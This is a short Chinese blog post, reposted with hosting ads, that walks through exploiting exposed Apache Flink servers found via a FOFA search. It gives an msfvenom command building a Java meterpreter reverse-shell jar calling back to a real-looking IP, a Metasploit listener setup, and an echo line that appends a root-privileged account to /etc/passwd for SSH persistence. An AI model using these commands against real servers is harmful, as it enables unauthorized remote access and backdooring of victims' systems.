ApacheFlink未授权远程代码执行提权(实战)-创新互联

1、fofa 搜索 app=“Apache-Flink” 可以看到有上千个
在这里插入图片描述
2、生成木马
下面展示一些内联代码片

创新互联主营太和网站建设的网络公司,主营网站建设方案,App定制开发,太和h5微信小程序搭建,太和网站营销推广欢迎太和等地区企业咨询
msfvenom -p java/meterpreter/reverse_tcp LHOST=47.103.79.70 LPORT=4444 -f jar >rce.jar

msfvenom -p java/meterpreter/reverse_tcp LHOST=47.103.79.70 LPORT=4444 -f jar >rce.jar
3、打开msf 进行如下配置,并进行监听
下面展示一些内联代码片

use exploit/multi/handler
set payload java/shell/reverse_tcp
set LHOST 47.103.79.70
set lport 4444
lport =>4444
run

在这里插入图片描述
3、上传刚才生成的木马,并执行
在这里插入图片描述
在这里插入图片描述
4、看到shell已经反弹回来
在这里插入图片描述
5、通过id 、 whoami 、cat /etc/passwd等命令查看当前用户及权限
在这里插入图片描述
6、通过如下代码强制写入账号及密码

echo "sql:LRxM3nP3LOiYU:0:0:hello:/root:/bin/bash">>/etc/passwd

7、再次查看passwd可看到账号已经写入成功,现在即可ssh登录了 密码为123
在这里插入图片描述
8、如果遇到登录失败,看参考上一篇docker提权的常见问题进行解决
链接: link
https://blog.csdn.net/u010025272/article/details/128176310?spm=1001.2014.3001.5502

你是否还在寻找稳定的海外服务器提供商?创新互联www.cdcxhl.cn海外机房具备T级流量清洗系统配攻击溯源,准确流量调度确保服务器高可用性,企业级服务器适合批量采购,新人活动首月15元起,快前往官网查看详情吧


分享文章:ApacheFlink未授权远程代码执行提权(实战)-创新互联
标题来源:http://scyanting.com/article/hojhg.html